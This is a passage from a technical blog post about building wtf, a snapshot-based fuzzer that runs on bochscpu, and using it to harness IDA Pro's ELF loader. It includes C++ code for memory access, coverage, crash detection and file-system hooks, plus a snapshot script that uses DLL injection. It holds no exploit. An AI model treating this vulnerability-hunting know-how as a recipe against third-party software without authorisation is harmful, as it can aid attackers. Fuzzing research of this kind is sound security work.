  2. The user writes a module to tell wtf how to insert a test case in the target. wtf provides basic features like reading physical and virtual memory ranges, read and write registers, etc. The user also defines exit conditions to tell the fuzzer when to stop executing test cases.
  3. wtf runs the targeted code, tracks code coverage, detects crashes, and tracks dirty memory.
  4. wtf restores the dirty physical memory from the kernel crash dump and resets the CPU state. It generates a new test case, rinse & repeat.

After laying out the plan, I realized that I didn't have code that parsed Windows kernel crash dumps, which is essential for wtf. So I wrote kdmp-parser, a C++ library that parses Windows kernel crash dumps. I wrote it myself because I couldn't find a simple drop-in library available off the shelf. Getting physical memory is not enough though, because I also needed to dump the CPU state as well as MSRs, etc. Thankfully yrp604 had already hacked up a WinDbg JavaScript extension to do that work, so I reused it: bdump.js.

Once I was able to extract the physical memory & the CPU state, I needed an execution environment to run my target. Again, yrp604 was working on bochscpu at the time, so I started there. bochscpu is basically bochs' CPU exposed as a Rust library with C bindings (yes, he kindly made bindings because I didn't want to touch any Rust). It is a software CPU that knows how to run Intel 64-bit code and knows about segmentation, rings, MSRs, etc. It also doesn't use any of bochs' devices, so it is much lighter. From the start, I decided that wtf wouldn't handle any devices: no disk, no screen, no mouse, no keyboard, etc.

Bochscpu 101

The first step was to load up the physical memory and configure the CPU of the execution environment. Memory in bochscpu is lazy: you start execution with no physical memory available and bochs invokes a callback of yours to tell you when the guest is accessing physical memory that hasn't been mapped. This is great because:

  1. No need to load an entire dump of memory inside the emulator when it starts,
  2. Only used memory gets mapped making the instance very light in memory usage.

I also need to introduce a few acronyms that I use everywhere:

  1. GPA: Guest physical address. This is a physical address inside the guest. The guest is what is run inside the emulator.
  2. GVA: Guest virtual address. This is guest virtual memory.
  3. HVA: Host virtual address. This is virtual memory inside the host. The host is what runs the execution environment.

To register the callback you need to invoke bochscpu_mem_missing_page. The callback receives the GPA that is being accessed and you can call bochscpu_mem_page_insert to insert an HVA page that backs a GPA into the environment. Yes, all guest physical memory is backed by regular virtual memory that the host allocates. Here is a simple example of what the wtf callback looks like:

void StaticGpaMissingHandler(const uint64_t Gpa) {
  const Gpa_t AlignedGpa = Gpa_t(Gpa).Align();
  BochsHooksDebugPrint("GpaMissingHandler: Mapping GPA {:#x} ({:#x}) ..\n",
                       AlignedGpa, Gpa);

  const void *DmpPage =
      reinterpret_cast<BochscpuBackend_t *>(g_Backend)->GetPhysicalPage(
          AlignedGpa);
  if (DmpPage == nullptr) {
    BochsHooksDebugPrint(
        "GpaMissingHandler: GPA {:#x} is not mapped in the dump.\n",
        AlignedGpa);
  }

  uint8_t *Page = (uint8_t *)aligned_alloc(Page::Size, Page::Size);
  if (Page == nullptr) {
    fmt::print("Failed to allocate memory in GpaMissingHandler.\n");
    __debugbreak();
  }

  if (DmpPage) {

    //
    // Copy the dump page into the new page.
    //

    memcpy(Page, DmpPage, Page::Size);

  } else {

    //
    // Fake it 'till you make it.
    //

    memset(Page, 0, Page::Size);
  }

  //
  // Tell bochscpu that we inserted a page backing the requested GPA.
  //

  bochscpu_mem_page_insert(AlignedGpa.U64(), Page);
}

It is simple:

  1. we allocate a page of memory with aligned_alloc as bochs requires page-aligned memory,
  2. we populate its content using the crash dump,
  3. we assume that if the guest accesses physical memory that isn't in the crash dump, the OS is allocating "new" memory; we fill those pages with zeroes. We also assume that if we are wrong about that, the guest will crash in spectacular ways.

To create a context, you call bochscpu_cpu_new to create a virtual CPU and then bochscpu_cpu_set_state to set its state. This is a shortened version of LoadState:

void BochscpuBackend_t::LoadState(const CpuState_t &State) {
  bochscpu_cpu_state_t Bochs;
  memset(&Bochs, 0, sizeof(Bochs));

  Seed_ = State.Seed;
  Bochs.bochscpu_seed = State.Seed;
  Bochs.rax = State.Rax;
  Bochs.rbx = State.Rbx;
//...
  Bochs.rflags = State.Rflags;
  Bochs.tsc = State.Tsc;
  Bochs.apic_base = State.ApicBase;
  Bochs.sysenter_cs = State.SysenterCs;
  Bochs.sysenter_esp = State.SysenterEsp;
  Bochs.sysenter_eip = State.SysenterEip;
  Bochs.pat = State.Pat;
  Bochs.efer = uint32_t(State.Efer.Flags);
  Bochs.star = State.Star;
  Bochs.lstar = State.Lstar;
  Bochs.cstar = State.Cstar;
  Bochs.sfmask = State.Sfmask;
  Bochs.kernel_gs_base = State.KernelGsBase;
  Bochs.tsc_aux = State.TscAux;
  Bochs.fpcw = State.Fpcw;
  Bochs.fpsw = State.Fpsw;
  Bochs.fptw = State.Fptw;
  Bochs.cr0 = uint32_t(State.Cr0.Flags);
  Bochs.cr2 = State.Cr2;
  Bochs.cr3 = State.Cr3;
  Bochs.cr4 = uint32_t(State.Cr4.Flags);
  Bochs.cr8 = State.Cr8;
  Bochs.xcr0 = State.Xcr0;
  Bochs.dr0 = State.Dr0;
  Bochs.dr1 = State.Dr1;
  Bochs.dr2 = State.Dr2;
  Bochs.dr3 = State.Dr3;
  Bochs.dr6 = State.Dr6;
  Bochs.dr7 = State.Dr7;
  Bochs.mxcsr = State.Mxcsr;
  Bochs.mxcsr_mask = State.MxcsrMask;
  Bochs.fpop = State.Fpop;

#define SEG(_Bochs_, _Whv_)                                                    \
  {                                                                            \
    Bochs._Bochs_.attr = State._Whv_.Attr;                                     \
    Bochs._Bochs_.base = State._Whv_.Base;                                     \
    Bochs._Bochs_.limit = State._Whv_.Limit;                                   \
    Bochs._Bochs_.present = State._Whv_.Present;                               \
    Bochs._Bochs_.selector = State._Whv_.Selector;                             \
  }

  SEG(es, Es);
  SEG(cs, Cs);
  SEG(ss, Ss);
  SEG(ds, Ds);
  SEG(fs, Fs);
  SEG(gs, Gs);
  SEG(tr, Tr);
  SEG(ldtr, Ldtr);

#undef SEG

#define GLOBALSEG(_Bochs_, _Whv_)                                              \
  {                                                                            \
    Bochs._Bochs_.base = State._Whv_.Base;                                     \
    Bochs._Bochs_.limit = State._Whv_.Limit;                                   \
  }

  GLOBALSEG(gdtr, Gdtr);
  GLOBALSEG(idtr, Idtr);

  // ...
  bochscpu_cpu_set_state(Cpu_, &Bochs);
}

In order to register various hooks, you need a chain of bochscpu_hooks_t structures. For example, wtf registers them like this:

//
// Prepare the hooks.
//

Hooks_.ctx = this;
Hooks_.after_execution = StaticAfterExecutionHook;
Hooks_.before_execution = StaticBeforeExecutionHook;
Hooks_.lin_access = StaticLinAccessHook;
Hooks_.interrupt = StaticInterruptHook;
Hooks_.exception = StaticExceptionHook;
Hooks_.phy_access = StaticPhyAccessHook;
Hooks_.tlb_cntrl = StaticTlbControlHook;

I don't want to describe every hook but we get notified every time an instruction is executed and every time physical or virtual memory is accessed. The hooks are documented in instrumentation.txt if you are curious. As an example, this is the mechanism used to provide full system code coverage:

void BochscpuBackend_t::BeforeExecutionHook(
        /*void *Context, */ uint32_t, void *) {

  //
  // Grab the rip register off the cpu.
  //

  const Gva_t Rip = Gva_t(bochscpu_cpu_rip(Cpu_));

  //
  // Keep track of new code coverage or log into the trace file.
  //

  const auto &Res = AggregatedCodeCoverage_.emplace(Rip);
  if (Res.second) {
    LastNewCoverage_.emplace(Rip);
  }

  // ...
}

Once the hook chain is configured, you start execution of the guest with bochscpu_cpu_run:

//
// Lift off.
//

bochscpu_cpu_run(Cpu_, HookChain_);

Great, we're now pros and we can run some code!

Building the basics

In this part, I focus on the various fundamental blocks that we need to develop for the fuzzer to work and be useful.

Memory access facilities

As mentioned in the introduction, the user needs to tell the fuzzer how to insert a test case into its target. As a result, the user needs to be able to read & write physical and virtual memory.

Let's start with the easy one. To write into guest physical memory we need to find the backing HVA page. bochscpu uses a dictionary to map GPA to HVA pages that we can query using bochscpu_mem_phy_translate. Keep in mind that two adjacent GPA pages are not necessarily adjacent in the host address space, that is why writing across two pages needs extra care.
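
Below is a minimal sketch (not wtf's actual implementation) of what that extra care means: the physical write is chunked so that no single memcpy ever crosses a 4KB page boundary, since adjacent GPAs can be backed by non-adjacent HVAs. It assumes bochscpu_mem_phy_translate returns the HVA backing a page-aligned GPA, as described above.

// Sketch only: chunk a physical write so it never straddles a page boundary.
// Assumes bochscpu_mem_phy_translate() returns the HVA backing an aligned GPA.
bool PhyWrite(const uint64_t Gpa, const uint8_t *Buffer, const size_t BufferSize) {
  size_t Written = 0;
  while (Written < BufferSize) {
    const uint64_t CurrentGpa = Gpa + Written;
    const uint64_t AlignedGpa = CurrentGpa & ~uint64_t(0xfff);
    const uint64_t Offset = CurrentGpa & 0xfff;

    //
    // Never cross the end of the current 4KB page in a single copy.
    //

    const size_t Chunk = std::min(BufferSize - Written, size_t(0x1000 - Offset));
    uint8_t *Hva = (uint8_t *)bochscpu_mem_phy_translate(AlignedGpa);
    if (Hva == nullptr) {
      return false;
    }

    memcpy(Hva + Offset, Buffer + Written, Chunk);
    Written += Chunk;
  }

  return true;
}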

Writing to virtual memory is trickier because we need to know the backing GPAs. This means emulating the MMU and parsing the page tables. This gives us GPAs and we know how to write in this space. Same as above, writing across two pages needs extra care.
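
Here is the same idea sketched for the virtual side (again, not wtf's exact code): the write is chunked per page and every GVA goes through the emulated MMU first. GvaToGpa() below is a placeholder for the 4-level page-table walk, and PhyWrite is the physical sketch above.

// Sketch only: write guest virtual memory by translating each page via the
// emulated MMU (GvaToGpa is a placeholder for the page-table walk).
bool VirtWrite(const uint64_t Gva, const uint8_t *Buffer, const size_t BufferSize) {
  size_t Written = 0;
  while (Written < BufferSize) {
    const uint64_t CurrentGva = Gva + Written;
    const uint64_t Offset = CurrentGva & 0xfff;
    const size_t Chunk = std::min(BufferSize - Written, size_t(0x1000 - Offset));

    uint64_t Gpa = 0;
    if (!GvaToGpa(CurrentGva, Gpa)) {

      //
      // The page tables don't map this GVA; bail out.
      //

      return false;
    }

    if (!PhyWrite(Gpa, Buffer + Written, Chunk)) {
      return false;
    }

    Written += Chunk;
  }

  return true;
}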

Instrumenting execution flow

Being able to instrument the target is very important because both the user and wtf itself need this to implement features. For example, crash detection is implemented by wtf using breakpoints in strategic areas. As another example, the user might need to skip a function call and fake a return value. Implementing breakpoints in an emulator is easy as we receive a notification when an instruction is executed; this is the perfect spot to check if we have a registered breakpoint at this address and, if so, invoke a callback:

void BochscpuBackend_t::BeforeExecutionHook(
        /*void *Context, */ uint32_t, void *) {

  //
  // Grab the rip register off the cpu.
  //

  const Gva_t Rip = Gva_t(bochscpu_cpu_rip(Cpu_));

  // ...

  //
  // Handle breakpoints.
  //

  if (Breakpoints_.contains(Rip)) {
    Breakpoints_.at(Rip)(this);
  }
}

Handling infinite loop

To protect the fuzzer against infinite loops, the AfterExecutionHook hook is used to count instructions. This allows us to limit test case execution:

void BochscpuBackend_t::AfterExecutionHook(/*void *Context, */ uint32_t,
                                           void *) {

  //
  // Keep track of the instructions executed.
  //

  RunStats_.NumberInstructionsExecuted++;

  //
  // Check the instruction limit.
  //

  if (InstructionLimit_ > 0 &&
      RunStats_.NumberInstructionsExecuted > InstructionLimit_) {

    //
    // If we're over the limit, we stop the cpu.
    //

    BochsHooksDebugPrint("Over the instruction limit ({}), stopping cpu.\n",
                         InstructionLimit_);
    TestcaseResult_ = Timedout_t();
    bochscpu_cpu_stop(Cpu_);
  }
}

Tracking code coverage

Again, getting full system code coverage with bochscpu is very easy thanks to the hook points. Every time an instruction is executed we add the address into a set:

void BochscpuBackend_t::BeforeExecutionHook(
        /*void *Context, */ uint32_t, void *) {

  //
  // Grab the rip register off the cpu.
  //

  const Gva_t Rip = Gva_t(bochscpu_cpu_rip(Cpu_));

  //
  // Keep track of new code coverage or log into the trace file.
  //

  const auto &Res = AggregatedCodeCoverage_.emplace(Rip);
  if (Res.second) {
    LastNewCoverage_.emplace(Rip);
  }

  // ...
}

Tracking dirty memory

wtf tracks dirty memory to be able to restore state fast. Instead of restoring the entire physical memory, we simply restore the memory that has changed since the beginning of the execution. One of the hook points notifies us when the guest accesses memory, so it is easy to know which memory gets written to.

void BochscpuBackend_t::LinAccessHook(/*void *Context, */ uint32_t,
                                      uint64_t VirtualAddress,
                                      uint64_t PhysicalAddress, uintptr_t Len,
                                      uint32_t, uint32_t MemAccess) {

  // ...

  //
  // If this is not a write access, we don't care to go further.
  //

  if (MemAccess != BOCHSCPU_HOOK_MEM_WRITE &&
      MemAccess != BOCHSCPU_HOOK_MEM_RW) {
    return;
  }

  //
  // Adding the physical address to the set of dirty GPAs.
  // We don't use DirtyVirtualMemoryRange here as we need to
  // do a GVA->GPA translation which is a bit costly.
  //

  DirtyGpa(Gpa_t(PhysicalAddress));
}

Note that accesses straddling pages aren't handled in this callback because bochs delivers one call per page. Once wtf knows which pages are dirty, restoring is easy:

bool BochscpuBackend_t::Restore(const CpuState_t &CpuState) {
  // ...
  //
  // Restore physical memory.
  //

  uint8_t ZeroPage[Page::Size];
  memset(ZeroPage, 0, sizeof(ZeroPage));
  for (const auto DirtyGpa : DirtyGpas_) {
    const uint8_t *Hva = DmpParser_.GetPhysicalPage(DirtyGpa.U64());

    //
    // As we allocate physical memory pages full of zeros when
    // the guest tries to access a GPA that isn't present in the dump,
    // we need to be able to restore those. It's easy, if the Hva is nullptr,
    // we point it to a zero page.
    //

    if (Hva == nullptr) {
      Hva = ZeroPage;
    }

    bochscpu_mem_phy_write(DirtyGpa.U64(), Hva, Page::Size);
  }

  //
  // Empty the set.
  //

  DirtyGpas_.clear();

  // ...
  return true;
}

Generic mutators

I think generic mutators are great but I didn't want to spend too much time worrying about them. Ultimately I think you get more value out of writing a domain-specific generator and building a diverse high-quality corpus. So I simply ripped off libfuzzer's and honggfuzz's.

class LibfuzzerMutator_t {
  using CustomMutatorFunc_t =
      decltype(fuzzer::ExternalFunctions::LLVMFuzzerCustomMutator);
  fuzzer::Random Rand_;
  fuzzer::MutationDispatcher Mut_;
  std::unique_ptr<fuzzer::Unit> CrossOverWith_;

public:
  explicit LibfuzzerMutator_t(std::mt19937_64 &Rng);

  size_t Mutate(uint8_t *Data, const size_t DataLen, const size_t MaxSize);
  void RegisterCustomMutator(const CustomMutatorFunc_t F);
  void SetCrossOverWith(const Testcase_t &Testcase);
};

class HonggfuzzMutator_t {
  honggfuzz::dynfile_t DynFile_;
  honggfuzz::honggfuzz_t Global_;
  std::mt19937_64 &Rng_;
  honggfuzz::run_t Run_;

public:
  explicit HonggfuzzMutator_t(std::mt19937_64 &Rng);
  size_t Mutate(uint8_t *Data, const size_t DataLen, const size_t MaxSize);
  void SetCrossOverWith(const Testcase_t &Testcase);
};

Corpus store

Code coverage in wtf is basically the fitness function. Every test case that generates new code coverage is added to the corpus. The code that keeps track of the corpus is basically a glorified list of test cases that are kept in memory.

The main loop asks for a test case from the corpus which gets mutated by one of the generic mutators and finally runs into one of the execution environments. If the test case generated new coverage it gets added to the corpus store - nothing fancy.

    //
    // If the coverage size has changed, it means that this testcase
    // provided new coverage indeed.
    //

    const bool NewCoverage = Coverage_.size() > SizeBefore;
    if (NewCoverage) {

      //
      // Allocate a test that will get moved into the corpus and maybe
      // saved on disk.
      //

      Testcase_t Testcase((uint8_t *)ReceivedTestcase.data(),
                          ReceivedTestcase.size());

      //
      // Before moving the buffer into the corpus, set up cross over with
      // it.
      //

      Mutator_->SetCrossOverWith(Testcase);

      //
      // Ready to move the buffer into the corpus now.
      //

      Corpus_.SaveTestcase(Result, std::move(Testcase));
    }
  }

  // [...]

  //
  // If we get here, it means that we are ready to mutate.
  // First thing we do is to grab a seed.
  //

  const Testcase_t *Testcase = Corpus_.PickTestcase();
  if (!Testcase) {
    fmt::print("The corpus is empty, exiting\n");
    std::abort();
  }

  //
  // If the testcase is too big, abort as this should not happen.
  //

  if (Testcase->BufferSize_ > Opts_.TestcaseBufferMaxSize) {
    fmt::print(
        "The testcase buffer len is bigger than the testcase buffer max "
        "size.\n");
    std::abort();
  }

  //
  // Copy the input in a buffer we're going to mutate.
  //

  memcpy(ScratchBuffer_.data(), Testcase->Buffer_.get(),
          Testcase->BufferSize_);

  //
  // Mutate in the scratch buffer.
  //

  const size_t TestcaseBufferSize =
      Mutator_->Mutate(ScratchBuffer_.data(), Testcase->BufferSize_,
                        Opts_.TestcaseBufferMaxSize);

  //
  // Copy the testcase in its own buffer before sending it to the
  // consumer.
  //

  TestcaseContent.resize(TestcaseBufferSize);
  memcpy(TestcaseContent.data(), ScratchBuffer_.data(), TestcaseBufferSize);

Detecting context switches

Because we are running an entire OS, we want to avoid spending time executing things that aren't of interest to our purpose. If you are fuzzing ida64.exe you don't really care about executing explorer.exe code. For this reason, we look for cr3 changes thanks to the TlbControlHook callback and stop execution if needed:

void BochscpuBackend_t::TlbControlHook(/*void *Context, */ uint32_t,
                                       uint32_t What, uint64_t NewCrValue) {

  //
  // We only care about CR3 changes.
  //

  if (What != BOCHSCPU_HOOK_TLB_CR3) {
    return;
  }

  //
  // And we only care about it when the CR3 value is actually different from
  // when we started the testcase.
  //

  if (NewCrValue == InitialCr3_) {
    return;
  }

  //
  // Stop the cpu as we don't want to be context-switching.
  //

  BochsHooksDebugPrint("The cr3 register is getting changed ({:#x})\n",
                       NewCrValue);
  BochsHooksDebugPrint("Stopping cpu.\n");
  TestcaseResult_ = Cr3Change_t();
  bochscpu_cpu_stop(Cpu_);
}

Debug symbols

Imagine yourself fuzzing a target with wtf now. You need to write a fuzzer module in order to tell wtf how to feed a test case to your target. To do that, you might need to read some global state to retrieve offsets of critical structures. We've built memory access facilities so you can definitely do that, but you have to hardcode addresses. This gets in the way really fast when you are taking new snapshots, porting the fuzzer to a new version of the targeted software, etc.

This was identified early on as a big pain point for the user and I needed a way to not hardcode things that didn't need to be hardcoded. To address this problem, on Windows I use the IDebugClient / IDebugControl COM objects that allow programmatic use of dbghelp and dbgeng features. You can load a crash dump, evaluate and resolve symbols, etc. This is what the Debugger_t class does.
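
As a quick usage sketch (the helper names match what appears elsewhere in this post, but the symbol below is just an example borrowed from the snapshotting script), a module can resolve addresses at run time instead of hardcoding them:

// Resolve an address through the debugger instance instead of hardcoding it;
// "ida64!init_database" is used purely as an example symbol here.
const Gva_t InitDatabase = Gva_t(g_Dbg.GetSymbol("ida64!init_database"));
if (!g_Backend->SetBreakpoint(InitDatabase, [](Backend_t *Backend) {
      DebugPrint("init_database hit!\n");
    })) {
  return false;
}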

Trace generation

The most annoying thing for me was that execution backends are extremely opaque. It is really hard to see what's going on within them. Actually, if you have ever tried to use whv / kvm APIs you probably ran into the case where the API tells you that you loaded a 'wrong' CPU state. It might be an MSR not configured right, a weird segment descriptor, etc. Figuring out where the issue comes from is both painful and frustrating.

Not knowing what's happening is also annoying when the guest is bug-checking inside the backend. To address the lack of transparency I decided to generate execution traces that I could use for debugging. It is very rudimentary yet very useful to verify that the execution inside the backend is correct. In addition to this tool, you can always modify your module to add strategic breakpoints and dump registers when you want. Those traces are pretty cool because you get to follow everything that happens in the system: from user-mode to kernel-mode, the page-fault handler, etc.

Those traces can also be loaded into lighthouse to analyze the coverage generated by a particular test case.

Crash detection

The last basic block that I needed was user-mode crash detection. I had done some work around the user-mode exception handler in the past, so I kind of knew my way around it. I decided to hook ntdll!RtlDispatchException & nt!KiRaiseSecurityCheckFailure to detect fail-fast exceptions that can be triggered by stack cookie check failures.
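
Below is a minimal sketch of that idea, not wtf's exact hooks: Crash_t, Stop() and Rcx() are assumed names standing in for however the backend records the test case result and exposes registers.

// Sketch only: flag the test case as a crash when the user-mode exception
// dispatcher is reached. Crash_t / Stop() / Rcx() are assumed helper names.
if (!g_Backend->SetBreakpoint(
        "ntdll!RtlDispatchException", [](Backend_t *Backend) {
          //
          // On x64 the first argument (rcx) is the EXCEPTION_RECORD pointer,
          // which is handy for triaging the crash later.
          //

          DebugPrint("Crash detected, exception record @ {:#x}\n",
                     Backend->Rcx());
          Backend->Stop(Crash_t());
        })) {
  return false;
}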

Harnessing IDA: walking barefoot into the desert

Once I was done writing the basic features, I started to harness IDA. I knew I wanted to target the loader plugins and based on their sizes as well as past vulnerabilities it felt like looking at ELF was my best chance.

I initially started to harness IDA with its GUI and everything. In retrospect, this was bonkers as I remember handling tons of weird things related to Qt and win32k. After a few weeks of making progress here and there I realized that IDA had a few options to make my life easier:

  • IDA_NO_HISTORY=1 meant that I didn't have to handle as many registry accesses,
  • The -B option allows running IDA in batch-mode from the command line,
  • TVHEADLESS=1 also helped a lot regarding GUI/Qt stuff I was working around.

Some of those options were documented later this year by Igor in this blog post: Igor’s tip of the week #08: Batch mode under the hood.

Inserting test case

After finding those out, it immediately felt like harnessing was possible again. The main problem I had was that IDA reads the input file lazily via fread, fseek, etc. It also reads a bunch of other things like configuration files, the license file, etc.

To be able to deliver my test cases I implemented a layer of hooks that allowed me to pass through file i/o from the guest to my host. This allowed me to read my IDA license keys, the configuration files as well as my input. It also meant that I could sink file writes made to the .id0, .id1, .nam, and all the files that IDA generates that I didn't care about. This was quite a bit of work and it was not really fun work either.

I was not a big fan of this pass through layer because I was worried that a bug in my code could mean overwriting files on my host or lead to that kind of badness. That is why I decided to replace this pass-through layer by reading from memory buffers. During startup, wtf reads the actual files into buffers and the file-system hooks deliver the bytes as needed. You can see this work in fshooks.cc.

This is an example of what this layer allowed me to do:

bool Ida64ConfigureFsHandleTable(const fs::path &GuestFilesPath) {

  //
  // Those files are files we want to redirect to host files. When there is
  // a hooked i/o targeted to one of them, we deliver the i/o on the host
  // by calling the appropriate syscalls and proxy back the result to the
  // guest.
  //

  const std::vector<std::u16string> GuestFiles = {
      uR"(\??\C:\Program Files\IDA Pro 7.5\ida.key)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\ida.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\noret.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\pe.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\plugins\plugins.cfg)"};

  for (const auto &GuestFile : GuestFiles) {
    const size_t LastSlash = GuestFile.find_last_of(uR"(\)");
    if (LastSlash == GuestFile.npos) {
      fmt::print("Expected a / in {}\n", u16stringToString(GuestFile));
      return false;
    }

    const std::u16string GuestFilename = GuestFile.substr(LastSlash + 1);
    const fs::path HostFile(GuestFilesPath / GuestFilename);

    size_t BufferSize = 0;
    const auto Buffer = ReadFile(HostFile, BufferSize);
    if (Buffer == nullptr || BufferSize == 0) {
      fmt::print("Expected to find {}.\n", HostFile.string());
      return false;
    }

    g_FsHandleTable.MapExistingGuestFile(GuestFile.c_str(), Buffer.get(),
                                         BufferSize);
  }

  g_FsHandleTable.MapExistingWriteableGuestFile(
      uR"(\??\C:\Users\over\Desktop\wtf_input.id0)");
  g_FsHandleTable.MapNonExistingGuestFile(
      uR"(\??\C:\Users\over\Desktop\wtf_input.id1)");
  g_FsHandleTable.MapNonExistingGuestFile(
      uR"(\??\C:\Users\over\Desktop\wtf_input.nam)");
  g_FsHandleTable.MapNonExistingGuestFile(
      uR"(\??\C:\Users\over\Desktop\wtf_input.id2)");

  //
  // Those files are files we want to pretend that they don't exist in the
  // guest.
  //

  const std::vector<std::u16string> NotFounds = {
      uR"(\??\C:\Program Files\IDA Pro 7.5\ida64.int)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\idsnames)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\epoc.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\epoc6.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\epoc9.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\flirt.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\geos.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\linux.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\os2.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\win.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\win7.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\wince.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\loaders\hppacore.idc)",
      uR"(\??\C:\Users\over\AppData\Roaming\Hex-Rays\IDA Pro\proccache64.lst)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\Latin_1.clt)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\dwarf.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\atrap.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\hpux.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\i960.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\goodname.cfg)"};

  for (const std::u16string &NotFound : NotFounds) {
    g_FsHandleTable.MapNonExistingGuestFile(NotFound.c_str());
  }

  g_FsHandleTable.SetBlacklistDecisionHandler([](const std::u16string &Path) {
    // \ids\pc\api-ms-win-core-profile-l1-1-0.idt
    // \ids\api-ms-win-core-profile-l1-1-0.idt
    // \sig\pc\vc64seh.sig
    // \til\pc\gnulnx_x64.til
    // 6ba8075c8f243566350f741c7d6e9318089add.debug
    const bool IsIdt = Path.ends_with(u".idt");
    const bool IsIds = Path.ends_with(u".ids");
    const bool IsSig = Path.ends_with(u".sig");
    const bool IsTil = Path.ends_with(u".til");
    const bool IsDebug = Path.ends_with(u".debug");
    const bool Blacklisted = IsIdt || IsIds || IsSig || IsTil || IsDebug;

    if (Blacklisted) {
      return true;
    }

    //
    // The parser can invoke ida64!import_module to have the user select
    // a file that gets imported by the binary currently analyzed. This is
    // fine if the import directory is well formatted; when it's not, it
    // potentially uses garbage in the file as a path name. Strategy here
    // is to block the access if the path is not ASCII.
    //

    for (const auto &C : Path) {
      if (isascii(C)) {
        continue;
      }

      DebugPrint("Blocking a weird NtOpenFile: {}\n", u16stringToString(Path));
      return true;
    }

    return false;
  });

  return true;
}

Although this was probably the most annoying problem, there were tons more to deal with. I've decided to walk you through some of them.

Problem 1: Pre-load dlls

For IDA to know which loader is the right one to use, it loads all of them and asks each if it recognizes the file. Remember that there is no disk when running in wtf, so loading a DLL is a problem.

This problem was solved by injecting the DLLs into IDA with inject before generating the snapshot, so that when IDA loads them no file i/o is generated. The same problem happens with delay-loaded DLLs.

Problem 2: Paged-out memory

On Windows, memory can be swapped out and written to disk into the pagefile.sys file. When somebody accesses memory that has been paged out, the access triggers a #PF which the page fault handler resolves by loading the page back up from the pagefile. But again, this generates file i/o.

I solved this problem for user-mode with lockmem, a small utility that locks all virtual memory ranges into the process' working set. As an example, this is the script I used to snapshot IDA; it highlights how I used both inject and lockmem:

set BASE_DIR=C:\Program Files\IDA Pro 7.5
set PLUGINS_DIR=%BASE_DIR%\plugins
set LOADERS_DIR=%BASE_DIR%\loaders
set PROCS_DIR=%BASE_DIR%\procs
set NTSD=C:\Users\over\Desktop\x64\ntsd.exe

REM Remove a bunch of plugins
del "%PLUGINS_DIR%\python.dll"
del "%PLUGINS_DIR%\python64.dll"
[...]
REM Turning on PH
REM 02000000 Enable page heap (full page heap)
reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ida64.exe" /v "GlobalFlag" /t REG_SZ /d "0x2000000" /f
REM This is useful to disable stack-traces
reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ida64.exe" /v "PageHeapFlags" /t REG_SZ /d "0x0" /f

REM History is stored in the registry and so triggers cr3 change (when attaching to Registry process VA)
set IDA_NO_HISTORY=1
REM Set up headless mode and run IDA
set TVHEADLESS=1
REM https://www.hex-rays.com/products/ida/support/idadoc/417.shtml
start /b %NTSD% -d "%BASE_DIR%\ida64.exe" -B wtf_input

REM bp ida64!init_database
REM Bump suspend count: ~0n
REM Detach: qd
REM Find process, set ba e1 on address from kdbg
REM ntsd -pn ida64.exe ; fix suspend count: ~0m
REM should break.

REM Inject the dlls.
inject.exe ida64.exe "%PLUGINS_DIR%"
inject.exe ida64.exe "%LOADERS_DIR%"
inject.exe ida64.exe "%PROCS_DIR%"
inject.exe ida64.exe "%BASE_DIR%\libdwarf.dll"

REM Lock everything
lockmem.exe ida64.exe

REM You can now reattach; and ~0m to bump down the suspend count
%NTSD% -pn ida64.exe

Problem 3: Manually soft page-fault in memory from hooks

To insert my test cases in memory I used the file system hook layer described above as well as the virtual memory facilities we talked about earlier. Sometimes, the caller would allocate a memory buffer and call, let's say, fread to read the file into it. When fread was invoked, my hook triggered, and sometimes calling VirtWrite would fail. After debugging and inspecting the state of the PTEs, it was clear that the PTE was in an invalid state. This is because memory is lazy on Windows: the page fault handler is expected to be invoked, fix the PTE itself, and let execution carry on. Because we are doing the memory write ourselves, we don't generate a page fault, so the page fault handler never gets invoked.

To solve this, I try to do a virtual to physical translation and inspect the result. If the translation is successful it means the page tables are in a good state and I can perform the memory access. If it is not, I insert a page fault in the guest and resume execution. When execution restarts, the page fault handler runs, fixes the PTE, and returns execution to the instruction that was executing before the page fault. Because we have our hook there, we get reinvoked a second time but this time the virtual to physical translation works and we can do the memory write. Here is an example in ntdll!NtQueryAttributesFile:

if (!g_Backend->SetBreakpoint(
        "ntdll!NtQueryAttributesFile", [](Backend_t *Backend) {
          // NTSTATUS NtQueryAttributesFile(
          //  _In_  POBJECT_ATTRIBUTES      ObjectAttributes,
          //  _Out_ PFILE_BASIC_INFORMATION FileInformation
          //);
          // ...
          //
          // Ensure that the GuestFileInformation is faulted-in memory.
          //

          if (GuestFileInformation &&
              Backend->PageFaultsMemoryIfNeeded(
                  GuestFileInformation, sizeof(FILE_BASIC_INFORMATION))) {
            return;
          }

Problem 4: KVA shadow

